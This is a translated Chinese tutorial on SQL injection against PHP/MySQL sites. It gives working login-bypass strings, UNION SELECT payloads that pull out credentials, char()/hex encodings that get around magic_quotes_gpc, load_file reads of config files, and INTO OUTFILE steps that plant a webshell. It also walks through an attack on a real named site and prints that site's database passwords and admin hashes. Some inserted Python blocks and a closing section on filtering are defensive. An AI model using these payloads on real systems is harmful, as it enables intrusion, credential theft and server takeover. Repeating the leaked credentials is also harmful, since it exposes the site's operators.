We build the injection payload. Enter in the search box:
a%' and 1=2 union select 1,username,3,4,5,6,7,8,password,10,11 from alphaauthor #
Substituted into the SQL statement this becomes:
select * from alphadb where title like '%a%' and 1=2 union select 1,username,3,4,5,6,7,8,password,10,11 from alphaauthor #%'
The result is shown in Figure 17.
There it is, haha: everything comes out.
C: Let's look at the various injections by where they occur.
Attack patterns
1) First, the back end (admin login). The code:
//login.php
<?php
.......
$query = "select * from alphaauthor where username='" . $HTTP_POST_VARS["UserName"] . "' and password='" . $HTTP_POST_VARS["password"] . "'";
$result = mysql_query($query);
$data = mysql_fetch_array($result);
if ($data)
{
    echo "Login successful";
}
else
{
    echo "Please log in again";
    exit;
}
.........
?>
UserName and Password are put straight into the SQL and executed, without any filtering.
Let's see how to abuse this.
The most classic one:
In both the user name box and the password box, enter
' or ''='
Substituted into the SQL statement this becomes
select * from alphaauthor where username='' or ''='' and password='' or ''=''
This way $data is always true, i.e. we have logged in successfully.
There are other bypass methods; the principle is the same: make $data evaluate to true.
We can use the following variants.
1.
User name and password box both: ' or 'a'='a
The SQL becomes
select * from alphaauthor where username='' or 'a'='a' and password='' or 'a'='a'
2.
User name and password box both: ' or 1=1 and ''='
The SQL becomes
select * from alphaauthor where username='' or 1=1 and ''='' and password='' or 1=1 and ''=''
User name and password box both: ' or 2>1 and ''='
The SQL becomes
select * from alphaauthor where username='' or 2>1 and ''='' and password='' or 2>1 and ''=''
3.
User name: ' or 1=1 #
Password: anything
The SQL becomes
select * from alphaauthor where username='' or 1=1 # and password='anything'
Everything after the # is commented out, so of course it returns true.
4.
Assuming the admin has id=1, you can also use
User name: ' or id=1 #
Password: anything
The SQL becomes
select * from alphaauthor where username='' or id=1 # and password='anything'
Figure 18
See the result in Figure 19.
How about that? Logged straight in!
As the saying goes, nothing is impossible if you can think of it.
There are more constructions left for the reader to think about.
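The tautology bypasses above, reproduced as an added example that is not code from the original article: a small Python script that builds the login query the way the page's login.php does, next to a parameterized version of the same query. The alphaauthor table and its single row are constructed here, and SQLite stands in for MySQL so the script runs offline; since SQLite's comment syntax is -- rather than MySQL's #, the example uses the quote-balanced payloads (variants 1 and 2 above), which behave identically in both engines.

```python
import sqlite3


# Constructed sample data standing in for the page's alphaauthor table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE alphaauthor (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO alphaauthor VALUES (1, 'alpha', 'correct-horse')")
    return conn


def vulnerable_login(conn, username, password):
    """Same construction as the page's login.php: user input is pasted into the SQL text,
    so quotes in the input become part of the statement."""
    query = ("select * from alphaauthor where username='" + username +
             "' and password='" + password + "'")
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username, password):
    """Parameterized form: the values travel separately from the SQL text, so a quote in
    the input is just a character in the value and never reaches the SQL parser."""
    query = "select * from alphaauthor where username=? and password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


# The page's quote-balanced bypass inputs (entered in both boxes).
BYPASS_INPUTS = ["' or ''='", "' or 'a'='a", "' or 1=1 and ''='", "' or 2>1 and ''='"]


def compare(conn):
    """Per payload, whether the concatenated query and the parameterized query accept the
    login. The concatenated one returns True for every payload; the parameterized one
    returns False for all of them and still accepts the real credentials."""
    results = {}
    for payload in BYPASS_INPUTS:
        results[payload] = (vulnerable_login(conn, payload, payload),
                            safe_login(conn, payload, payload))
    results["real credentials"] = (vulnerable_login(conn, "alpha", "correct-horse"),
                                   safe_login(conn, "alpha", "correct-horse"))
    return results


if __name__ == "__main__":
    for label, (vuln, safe) in compare(make_db()).items():
        print("%-22s concatenated=%-5s parameterized=%s" % (label, vuln, safe))
```

Every payload passes the concatenated query because AND binds tighter than OR, so the trailing `or ''=''` makes the whole WHERE clause true regardless of the password; the bound parameters never change the shape of the statement, so only the stored credentials match.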
2) The second common injection point is the front end.
I have covered this many times already, including numeric and character types, so it is not repeated here.
Just one example as review: the injection vulnerability in Bihai Chao Download Station V2.0.3 Lite.
The code is not listed; go straight to
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
Figure 20
Look, we get what we want:
user name alpha,
password a long string.
Why put password in field 3 and username in field 5? As mentioned before, we guessed that fields 3 and 5 are string types, and the username and password fields we want to display should be of the same type, so we placed them there.
Why 18 fields? Recall that UNION SELECT requires the same number of columns before and after; we find the column count by increasing the number of selected values until the union displays normally, which here took 18 fields.
3) Other places, such as data modification, user registration, and user-level applications.
We already discussed update and insert above; since they are less common they are not elaborated here, but some advanced uses of update and insert will be mentioned below.
2: Injection with magic_quotes_gpc=ON (attack teaching part)
With magic_quotes_gpc=ON, every ' (single quote), " (double quote), \ (backslash) and NUL character is automatically escaped with a backslash.
This makes many injection methods fall apart. In this situation we can only inject numeric types that have not been handled with intval(). Numeric types have been discussed at length: since a numeric value is not wrapped in single quotes, the escaping is no obstacle and we can inject directly.
1) If it is a character type that is not enclosed in quotes, we have to use some string-handling functions.
There are many string functions; here we mainly discuss the following one (see section 7.4.10 of the MySQL Chinese reference manual):
char() interprets its arguments as integers and returns a string consisting of the characters given by the ASCII code values of those integers.
Of course you can also use the hexadecimal form of the characters instead, prefixed with 0x; see the example below.
//login.php
<?php
......
$query = "SELECT * FROM " . $art_system_db_table['user'] . " where username=$usrname and password='" . $pw . "'";
......
?>
Suppose we know that the back-end user name is alpha.
Converted to ASCII codes it is char(97,108,112,104,97);
converted to hexadecimal it is 0x616c706861.
(Tools for hexadecimal and ASCII conversion are provided on the CD.)
OK, enter directly in the browser:
http://localhost/site/admin/login.php?username=char(97,108,112,104,97)%23
The SQL statement becomes:
select * from alphaauthor where username=char(97,108,112,104,97) # and password=''
Figure 21
As expected, it executes successfully and we get what we wanted.
Of course we can also construct it like this:
http://localhost/site/admin/login.php?username=0x616c706861%23
The SQL statement becomes:
select * from alphaauthor where username=0x616c706861 # and password=''
Success once again. Quite a sense of accomplishment.
Maybe you will ask whether the # can be put inside char().
In fact char(97,108,112,104,97) is equivalent to 'alpha'.
Note the quotes around alpha, marking it as the string alpha.
We know that if we execute the following in MySQL
mysql> SELECT * FROM dl_users WHERE username=alpha;
ERROR 1054 (42S22): Unknown column 'alpha' in 'where clause'
Look at the returned error: MySQL treats the bare word alpha as a column name. So we have to put quotes around alpha,
as follows
mysql> SELECT * FROM dl_users WHERE username='alpha';
This is correct.
If you put the # inside, it becomes 'alpha #'.
Substituted into the SQL statement:
SELECT * FROM dl_users WHERE username='alpha #';
That of course does not work, because there is no user called alpha #.
OK, another example below.
//display.php
<?php
......
$query = "SELECT * FROM " . $art_system_db_table['article'] . " where type=$type";
......
?>
The code displays content according to the type; $type is not filtered and the program does not put quotes around it.
Suppose type contains the class xiaohua; the char() conversion of xiaohua is
char(120,105,97,111,104,117,97)
We build
http://localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
Substituted, the SQL statement is:
SELECT * FROM ".$art_system_db_table['article']." WHERE type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
Look, our user name and password come right out! No screenshot, just imagine it :P
2) Perhaps someone will ask whether the powerful load_file() can still be used when magic_quotes_gpc=ON.
That is exactly what we need. The usage format of load_file() is load_file('file path').
We have found that you only need to convert the 'file path' with char(). Try it:
load_file('c:/boot.ini') becomes
load_file(char(99,58,47,98,111,111,116,46,105,110,105))
Figure 22
Put it into the actual injection:
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
See Figure 23
Look, we see the content of boot.ini.
Unfortunately INTO OUTFILE '' cannot be bypassed this way, otherwise it would be even better. But there is still a use for select * from table into outfile '' ... (keeping you in suspense; it is explained below)
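From the defender's side, the char() and 0x literals of this section and the load_file() calls just above are the things worth noticing in a web server's access log, because they only appear when someone is smuggling strings past magic_quotes_gpc. The following is an added Python example, not code from the original article: it decodes both literal forms back into the string they represent and flags request parameters that contain them or the fragments union select, load_file( and into outfile. The log format, the keyword list and the three sample log lines (modelled on the page's own requests) are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# MySQL literal forms used on the page to represent strings without quotes.
CHAR_RE = re.compile(r"char\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)", re.IGNORECASE)
HEX_RE = re.compile(r"\b0x([0-9a-fA-F]+)\b")
# Fragments that have no business in a numeric id or a user name (assumed list).
KEYWORDS = ("union select", "load_file(", "into outfile")


def decode_literals(text):
    """Rewrite char(...) and 0x... literals as the quoted string they stand for,
    e.g. char(97,108,112,104,97) -> 'alpha'. Anything that is not a valid literal is left alone."""
    def char_sub(m):
        codes = [int(c) for c in m.group(1).split(",")]
        if any(c > 255 for c in codes):
            return m.group(0)
        return "'" + bytes(codes).decode("latin-1") + "'"

    def hex_sub(m):
        digits = m.group(1)
        if len(digits) % 2:  # odd length: not a byte string, leave it
            return m.group(0)
        return "'" + bytes.fromhex(digits).decode("latin-1") + "'"

    return HEX_RE.sub(hex_sub, CHAR_RE.sub(char_sub, text))


def scan_request(request_target):
    """Check every query parameter of one request and report the suspicious ones."""
    findings = []
    for name, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        decoded = decode_literals(value)
        reasons = [k for k in KEYWORDS if k in decoded.lower()]
        if decoded != value:
            reasons.append("encoded literal")
        if reasons:
            findings.append({"param": name, "decoded": decoded, "reasons": reasons})
    return findings


LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan_log(lines):
    """Run scan_request over common-log-format lines; returns (line number, findings) for hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m:
            findings = scan_request(m.group(1))
            if findings:
                hits.append((n, findings))
    return hits


# Constructed access-log lines: one benign request and two modelled on the page's payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Sep/2004:10:00:01 +0800] "GET /down/index.php?url=&dlid=5 HTTP/1.1" 200 4231',
    '10.0.0.5 - - [12/Sep/2004:10:00:07 +0800] "GET /site/admin/login.php?username=char(97,108,112,104,97)%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Sep/2004:10:00:15 +0800] "GET /down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 HTTP/1.1" 200 4880',
]

if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG):
        for f in findings:
            print("line %d: %s=%r (%s)" % (n, f["param"], f["decoded"], ", ".join(f["reasons"])))
```

Decoding before matching is the point: a rule that looks for the quoted string 'c:/boot.ini' never fires on `char(99,58,...)`, while the decoded view shows the analyst the file path and the login name the request was really carrying.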
Three: Some injection skills, many of them my own discoveries.
1. UNION SELECT skill
UNION is used to combine the results of multiple SELECT statements into one result set. The columns listed in the select_expression part of each SELECT must have the same type. The column names used in the first SELECT query are returned as the column names of the result set.
We can, however, guess the column types with the following method, which saves a lot of time.
First
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
Figure 24
Look: the software description shows 3 and the author shows 4, so we can guess that positions 3 and 4 are character type; the download count in front should be an int. OK, we build on this, estimating that username and password are also character type.
Try it:
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
Figure 25
Haha, with this method you can guess the types at a glance.
2. load_file read/write skill
I wonder whether you have noticed that when load_file() reads a PHP file, nothing shows up in the web page. E.g.:
'c:/apache/htdocs/site/lib/sql.inc.php' converted to hexadecimal: 0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870
We construct the following
http://localhost/site/display.php?id=451%20and%201=2%20union%20select%201,2,load_file(0x433a2f6170616368652f6874646f63732f736974652f6c69622f73716c2e696e632e706870),4,5,6,7,8,9,10,11
Figure 26
We find that the place where the article content is normally displayed should show sql.inc.php, but it is empty. Why?
Let's look at the page source.
Figure 27
Haha, look at the marked place: it is there after all. But why?
Because HTML uses <> for tags, the browser treats the <?php ... ?> block as markup and does not render it. Understood! Remember where to find it next time.
4. MD5 nightmare
Dr. Wang of Shandong University has recently been busy with MD5; we are cooler than her, we don't need to calculate anything, haha.
We have a way around MD5, but not everywhere: the md5() function in PHP cannot be bypassed, because everything you enter goes through it. What can be bypassed is md5() inside the SQL statement. Of course, other functions inside SQL can be bypassed the same way; the principle is the same.
See the example first:
//login.php
<?php
......
$query = "SELECT * from alphaauthor where username=md5($usrname) and password='" . $pw . "'";
......
?>
We submit directly in the browser
http:/login.php?username=char(97,98)) or 1=1%23
Substituted, the SQL statement becomes
select * from alphaauthor where username=md5(char(97,98)) or 1=1 #) and password=''
Remember that md5 needs a string-like argument; because there is or 1=1 behind it, we just give it char(97,98). OK, login successful! Look, the md5 in front is useless.
5. Core technique: writing a WebShell directly through a PHP MySQL injection vulnerability.
Getting a WebShell directly through injection should be what everyone is thinking about; let me show you below.
Here I assume you already know the physical path of the site; I assume the site path is c:/apache/htdocs/site, and the site's MySQL connection information is in /lib/sql.inc.php.
1) Suitable for magic_quotes_gpc=OFF
Suppose we can upload pictures, txt, zip and so on. We give our trojan a .jpg suffix and upload it; the uploaded path is /upload/2004091201.jpg.
OK, we start:
http://localhost/site/display.php?id=451%20and%201=2%20union%20select%201,2,load_file('c:/apache/htdocs/site/upload/2004091201.jpg'),4,5,6,7,8,9,10,11%20into%20outfile%20'c:/apache/htdocs/site/shell.php'
Because of the outfile the web page displays abnormally, but our task is done.
Figure 28
Let's look at http://localhost/site/shell.php?cmd=dir
Figure 29
Surprised? Our WebShell was created successfully. Did you see the 1 2 at the front? That is the output of our select 1,2!
2) Now the method of getting a webshell with magic_quotes_gpc=ON; obviously it can also be used with magic_quotes_gpc=OFF.
We read its configuration file directly, using the method of skill 2:
http://localhost/site/display.php?id=451%20and%201=2%20union%20select%201,2,load_file(0x433a2f6170616368652f6874646f63732f736974652f6c69622f73716c2e696e632e706870),4,5,6,7,8,9,10,11
and get the content of sql.inc.php.
OK, now we know the MySQL root password. We look for the phpMyAdmin back end
http://localhost/phpmyadmin/
and log in as root; the password is empty.
Figure 30
Then we create a new table with the following structure:
#
# Table structure for table `te`
#
CREATE TABLE te (
  cmd text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
#
# Dumping data for table `te`
#
INSERT INTO te VALUES ('
');
OK, now it is time for select * from table into outfile ''.
Directly in the phpMyAdmin SQL input, enter
select * from `te` into outfile 'c:/apache/htdocs/site/cmd1.php'
Figure 31
OK, executed successfully. We go to http://localhost/site/cmd1.php?cmd=dir to see the effect, shown in Figure 32.
What a nice WebShell! Haha, I like it too.
But have you noticed that, with magic_quotes_gpc=ON, we completed this work inside phpMyAdmin without having to consider the quote restriction at all? What does that tell you? phpMyAdmin is just too powerful. This is the way around magic_quotes_gpc=ON that I kept in suspense earlier!
6. We can also use update and insert to insert our data and then get our webshell, using the example above.
//reg.php
<?php
......
$query = "INSERT INTO members VALUES ('$id','$login','$pass','$email','2')";
......
?>
We enter our data in the Email field.
Suppose the id we registered is 10.
Then we find a place that can be injected:
http://localhost/site/display.php?id=451%20and%201=2%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20into%20outfile%20'c:/apache/htdocs/site/test.php'
OK, we have our webshell.
7. MySQL cross-database queries
Haven't you always heard that MySQL cannot do cross-database queries? Haha, today I will teach you a good way. It achieves a roundabout cross-database query by using load_file to read the files under MySQL's data folder.
An example.
Before that, let's talk about the structure of the MySQL data folder.
Under the data folder there is one folder per database name, and in it each table generates three files: .frm, .MYD and .MYI. For example:
MySQL has a database alpha, and the alpha library has two tables, alphaauthor and alphadb.
The content of the alpha folder is shown in Figure 33.
alphadb.MYD holds the data of the alphadb table, alphadb.frm holds the structure of the table, and alphadb.MYI holds its index. The content differs between MySQL versions and can be judged by opening the files in Notepad.
Experiment start
Suppose we know that another database yminfo210 exists with a table user, and the admin information is stored in user.
We go to
http://localhost/site/display.php?id=451%20and%201=2%20union%20select%201,2,load_file('yminfo210/user.MYD'),4,5,6,7,8,9,10,11
Explanation: load_file's default directory is MySQL's data directory, so we use load_file('yminfo210/user.MYD'); of course load_file('./yminfo210/user.MYD') is the same. Note that the default path of INTO OUTFILE is the current database's folder.
The result is shown in Figure 34.
We read the content
Hong admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer http://www.yoursite.com (Department of Sui KA of Sui of Sui 127.0.0.1 d |?????? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com? SDFASDFSDFA ASDFADFASD? E 麷 AM 麷 A 127.0.0.1 222 22222223423
Although it is a jumble, we can still see that the user name is admin,
the password is 698D51A19D8A121CE581499D7B701668, followed by additional information.
In this way we have achieved a roundabout cross-database query; the example below will mention it again!
Having said so much, let's put it to use. This test is on a famous security site, the Black and White Network (heibai.net).
I heard people say that Black and White has a vulnerability? Let's take a look.
http://www.heibai.net/down/show.php?id=5403 and 1=1
displays normally.
Figure 35
http://www.heibai.net/down/show.php?id=5403 and 1=2
does not display normally.
Figure 36
OK, we continue
http://www.heibai.net/down/show.php?id=5403 and 1=1 union select 1
The result is as follows
Figure 37
Note that the display name is missing in the picture, and it also contains:
Warning: mysql_fetch_object(): Supplied argument is not a valid MySQL result resource in d:/web/heibai/down/show.php on line 45
Warning: mysql_fetch_array(): Supplied argument is not a valid MySQL result resource in d:/web/heibai/down/global.php on line 578
Dizzy, the site's paths come right out; then you're done for!
We continue until we guess it:
http://www.heibai.net/down/show.php?id=5403 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
displays normally.
Figure 38
Good. We change the statement to
http://www.heibai.net/down/show.php?id=5403 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
shown in Figure 39.
Look, the introduction shows 12, so we can guess that position 12 should be character type!
OK, let's read the file content first.
d:/web/heibai/down/show.php converted to ASCII codes is
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)
We go to
view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19
view-source: shows the page source; as for why that is needed, it was explained above.
Figure 40
Because there is a statement in show.php that redirects to list.php if we submit directly in the browser.
We find require("./include/config.inc.php");
Good, this should be the configuration file. OK, continue.
d:/web/heibai/down/include/config.inc.php
converted to char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
We enter
http://www.heibai.net/down/show.php?id=5403 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
The result is shown in Figure 41.
Main content:
.......................
YMDOWN (Night Cat Download System) is an application that provides download services for websites
//-----------------------------------------------//
// General settings //
//-----------------------------------------------//
// Database information
$dbhost = "localhost"; // database host name
$dbuser = "download"; // database user name
$dbpasswd = "kunstar988"; // database password
$dbname = "download"; // database name
// cookie name
$cookie_name = "heibai";
// version number
$version = "1.0.1";
// data table names
$down_table = ymdown;
$down_user_table = ymdown_user;
$down_sort1_table = ymdown_sort1;
$down_sort2_table = ymdown_sort2;
Dizzy, it uses Night Cat's download system, and we know
$dbuser = "download"; // database user name
$dbpasswd = "kunstar988"; // database password
Maybe it will be useful.
The table names are the defaults, and we know Night Cat stores the admin password in ymdown_user.
We continue: http://www.heibai.net/down/show.php?id=5403 and 1=2 union select 1,2,3,username,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from ymdown_user
The result is shown in Figure 42.
From the displayed positions we know that the file size shows username and the application platform shows password (compare Figure 36).
username=dload, password=6558428. Night Cat's back end is in the admin directory by default; I searched for a long time and couldn't find it, dizzy.
I wanted to connect to MySQL directly, but found the port is not open (telnet fails). Let's look elsewhere!
http://www.heibai.net/vip/Article/login.php
looks like a member login; let's look at
d:/web/heibai/vip/Article/login.php
converted to char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)
We enter
http://www.heibai.net/down/show.php?id=5403 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)),13,14,15,16,17,18,19
The result is shown in Figure 43:
among them
require("./include/global.php");
require("./include/config.inc.php");
require("./mainfunction.php");
require("./function.php");
Of course, let's look at config.inc.php.
d:/web/heibai/vip/Article/include/config.inc.php
converted to char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
Enter
http://www.heibai.net/down/show.php?id=5403 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
The result is shown in Figure 44.
Lots of good stuff shows up.
$dbhost = "localhost"; // database host name
$dbuser = "root"; // database user name
$dbpass = "234ytr8ut"; // database password
$dbname = "article"; // database name
$ymcms_user_table = "user";
$ymcms_usergroup_table = "usergroup";
$ymcms_userrace_table = "userrace";
The tables are still the defaults, and there is the root password.
If only we could connect to MySQL, then we could use into outfile.
I looked for phpMyAdmin but didn't find it; maybe it isn't installed at all.
Reading c:/winnt/php.ini reveals
; Magic quotes
;
; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = On
Sob. In this painful situation, let's see if we can at least get a few member accounts.
Guess:
Member accounts are stored in the user table, so we read the user.MYD file in the article folder directly.
article/user.MYD converted to
char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)
We enter
http://www.heibai.net/down/show.php?id=5403 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)),13,14,15,16,17,18,19
The result is shown in Figure 45:
Dizzy, nothing is returned. Let's read article/user.frm
http://www.heibai.net/down/show.php?id=5403 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,102,114,109)),13,14,15,16,17,18,19
The result is shown in Figure 46.
Dizzy, the table structure is read successfully, but why can't article/user.MYD be read? If magic_quotes_gpc were OFF we could also try into outfile, but ...
Depressing. The test ends here; the remaining work is left to you!
The problem described in this article has been reported to Xingkun!
4: Preventing PHP MySQL injection.
The previous topics covered many prevention methods. Here I will mainly talk about prevention methods against PHP MySQL injection attacks.
As everyone saw, with magic_quotes_gpc=ON many injection attacks have no effect.
We can use this to harden our programs. The addslashes() function is equivalent to magic_quotes_gpc=ON and does not conflict with it; we can filter like this:
$usrname = addslashes($usrname);
$query = "select * from username where userid='$usrname'";
For ID types we can use the intval() function, which converts the variable into an integer type, which makes injection impossible.
We can write
$id = intval($id);
$query = "select * from alphadb where articleid='$id'";
What about character types?
We can filter with addslashes(), then filter "%" and "_".
E.g.:
$search = addslashes($search);
$search = str_replace("_", "\_", $search);
$search = str_replace("%", "\%", $search);
Remember, with magic_quotes_gpc=ON, do not replace the backslashes, as in the following:
$password = str_replace("\\", "", $password);
I remember this issue being mentioned in Darkness's article "An intrusion into a PHP site" (included on the CD).
There is also the login page. If there is only one administrator, we can md5 both UserName and Passwd directly, so it cannot be injected at all.
$username = md5($HTTP_POST_VARS["UserName"]);
$passwd = md5($HTTP_POST_VARS["passwd"]);
That is how I do it in my own back end.
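The filtering rules of this section, as an added Python example that is not the article's own code: numeric ids are validated as integers (stricter than intval(), which silently turns "1 and 1=2" into 1), the search term from the page's first example is bound as a parameter, and % and _ are escaped for LIKE with an explicit ESCAPE clause, which is the page's str_replace() idea expressed on the SQL side. SQLite stands in for MySQL so the script runs offline, and the alphadb rows are constructed. One caveat the page does not state: applying addslashes() to input that magic_quotes_gpc=ON has already escaped escapes each quote twice, so stored values gain stray backslashes; binding parameters, as below, avoids the question entirely.

```python
import re
import sqlite3


# Constructed rows standing in for the page's alphadb table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE alphadb (articleid INTEGER, title TEXT)")
    conn.executemany("INSERT INTO alphadb VALUES (?, ?)", [
        (1, "alpha release notes"), (2, "50% off"), (3, "under_score"), (4, "beta")])
    return conn


def to_id(value):
    """Integer id validation: accept only a plain decimal integer, otherwise refuse.
    PHP's intval('1 and 1=2') would return 1; here the request is rejected instead."""
    s = str(value).strip()
    if not re.fullmatch(r"-?\d+", s):
        raise ValueError("not an integer id: %r" % (value,))
    return int(s)


def get_article(conn, raw_id):
    """articleid is bound as an integer parameter; no string building at all."""
    row = conn.execute("select title from alphadb where articleid=?",
                       (to_id(raw_id),)).fetchone()
    return row[0] if row else None


def escape_like(term, esc="\\"):
    """Escape the LIKE metacharacters % and _ (and the escape character itself) so they
    match literally; the page does this with str_replace() before building the query."""
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def search_titles(conn, term, escape=True):
    """Substring search over title. With escape=True the term is escaped and an ESCAPE
    clause tells SQL which character was used; with escape=False a % or _ in the term
    acts as a wildcard. Either way the pattern is a bound parameter, never SQL text."""
    pattern = "%" + (escape_like(term) if escape else term) + "%"
    sql = "select title from alphadb where title like ?" + (" escape '\\'" if escape else "")
    rows = conn.execute(sql + " order by articleid", (pattern,)).fetchall()
    return [title for (title,) in rows]


# The payload from the search-box example at the top of the page; bound as a parameter
# it is just text to match against titles, not SQL.
SEARCH_PAYLOAD = "a%' and 1=2 union select 1,username,3,4,5,6,7,8,password,10,11 from alphaauthor #"

if __name__ == "__main__":
    db = make_db()
    print(search_titles(db, "%"), search_titles(db, "%", escape=False))
    print(search_titles(db, SEARCH_PAYLOAD))
    print(get_article(db, "1"))
```

Escaping the wildcards matters even with bound parameters: a bare % as the search term would otherwise match every row, which is the information leak the page's "%" and "_" filter is meant to close.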
Postscript:
This article has said a lot. Injection is a flexible technique, and many techniques are still developing. Any problems and opinions, come find me at the Yellow Corps (www.cnwill.com); criticism of the content is also welcome.